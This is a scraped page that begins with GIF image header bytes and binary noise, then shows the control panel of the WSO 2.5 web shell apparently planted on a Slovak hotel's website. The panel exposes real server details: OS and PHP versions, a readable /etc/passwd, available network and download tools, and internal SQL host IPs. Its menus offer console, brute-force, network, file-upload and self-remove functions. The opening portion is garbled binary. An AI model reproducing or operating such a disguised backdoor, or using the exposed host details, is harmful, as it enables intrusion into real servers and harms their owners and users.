GIF89aQla002WhϒuGHZZhhwЗ{ݺw,Uʋk34V/lƛvԱ՜ĮѭÙ̩vp0Yxj.Pš٣JjyDÄbQRS3:%׵ɥ*+Ҭ%ϹٶpEz|Xǫqb_Gν:9K1H; y UP1%Ff߬ʝyUǵsss6ݳY/nHZ~KO&*+̏pxrH6HGsNW Z% ktl9ű70񠲎F8W繠Hq ɉgƳ0~\:ҳ˭*?? `t`Z/н3JVW fȅaT vRb ~Ɔf U =iCwTeج?"ňiR" !$OP^€{>yϧ))&t Ǩ_>̩ ܾȉk<9!n >>?hݛͶ ݆'wZ!(Puke emoticon - puke-smiley-emoticon.gif!,Ql HY"%# _jȱC$4ag@3AFTi 4L8snG#L:e% HX1F#`!Xs%ڬh"N5{5pd@?=IV8AK}panyeEm(̹-1?83E#] װcˎv0ݑCx\ȓ+7V0} 5ýÃ/dй/P/zSYȑg_'G@tMs){y1.#I!h #Tx=`qđx׆D +:Lav 9H#0}63L)@esVg=iLxZ,0"s 0`Za;HGN0)ARO6SB(f`$ HQ+d6#<0!IU*ʉG@30i3:Xb5p'$$a;؃Q4t(*%r բHF;IձK5?1Nbj +P} 'կ>v,eӐu*9:nqu AqT:%J( ΀m`j[E.V>6"HbNQ9w(x V@jAx{^ 7`0w?@PcCu'a_AZ`_@ NƝ FA<@vF Ld!ypv `PO ;J`IpX &Xk `2z6le@γ{pg~Hc6x)N1#0 2v y5$x:[ubxЅ;ά6PN Ia^(4H` T[وv6RO E.jQ{l xN6!a_ P03[ /pyKpG {80Q@ O (i@[ype꩞YqI>%uމ*@1Oyi9*@YhK0dCW9W KP *\@PP I!B%̀+ +PX02 p`јi*`9AZq†KOZ/0[8y;GȢ@d@J\ pq^e9bz !7@9H@> ʏw0 YA7 pp7)\ PJ[ K ` ̚`0 ͠i :j`M `p`pp pa@&K`sjʫ䰰6` 70xPB;P 0 P6`p2g0-˰7PvCBk P ` jСWP@Rk:: Fk۸BP 70 R pM`b0}K!QhkJ C \и۸0B0 ]M0Q@ Q0;@ 尺0 PQpg «c][\м ۼ5p| @K[BB qf+ tp@+ QP* KYqt +@\|p `{ <ڱ\P L =ժ D =*^k Ul: {D<`N0eR@k컬0q|Ɛnw Cu p!ȍDp ! @`0ʭGD @ |0Rr 2+g @L`|p`Pͺ, l |0; `Ȱk 0tkҬ՜͆2\͆ Ҍ lO0 l`|ѽl͖ M @@pg{!9 |m,֬˷:ռΚpl 8-s !|nK|Ѱs9p0l\ml@9->ӷ:M +pp |D&}j< pР2r{ʖ7M;www.hotelbarbakan.sk - WSO 2.5
Uname:
User:
Php:
Hdd:
Cwd:
FreeBSD web253s225.dnsserver.eu 10.2-RELEASE-p7 FreeBSD 10.2-RELEASE-p7 #0: Mon Nov 2 14:19:39 UTC 2015 root@amd64- [exploit-db.com]
32090 ( u32090 ) Group: 1004 ( clients )
5.5.34 Safe mode: OFF [ phpinfo ] Datetime: 2017-12-16 02:10:43
2165.51 GB Free: 581.10 GB (26%)
/www/h/o/u32090/public_html/admin/polia/34/ drwxrwxrwx [ home ]

Server IP:
92.240.253.225
Client IP:
54.226.113.250
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

Server security information

Server software: Apache
Disabled PHP Functions: none
cURL support: enabled
Supported databases: MySql (5.6.27)

Readable /etc/passwd: yes [view]
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, tar, gzip, bzip2, nc, locate
Downloaders: wget, fetch, lynx, curl, lwp-mirror

HDD space:
Filesystem  Size  Used  Avail Capacity Mounted on
/dev/da0p2   48G   26G   18G  59%  /
Hosts:
::1			localhost localhost.my.domain
127.0.0.1		localhost localhost.my.domain
92.240.253.23      sql2.dnsserver.eu
92.240.253.24      sql3.dnsserver.eu
92.240.253.25      sql4.dnsserver.eu
92.240.253.26      sql5.dnsserver.eu
92.240.253.27      sql6.dnsserver.eu
92.240.253.15      sql7.dnsserver.eu
92.240.253.16      sql8.dnsserver.eu
92.240.253.9      sql9.dnsserver.eu
92.240.253.10      sql10.dnsserver.eu
92.240.253.22      sql11.dnsserver.eu
92.240.253.95      pgsql1.dnsserver.eu
92.240.253.118     sql12.dnsserver.eu
92.240.253.227     sql13.dnsserver.eu
92.240.253.199     sql14.dnsserver.eu
92.240.253.204     sql15.dnsserver.eu

posix_getpwuid ("Read" /etc/passwd)
From
To
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Execute:
Upload file: (Writeable)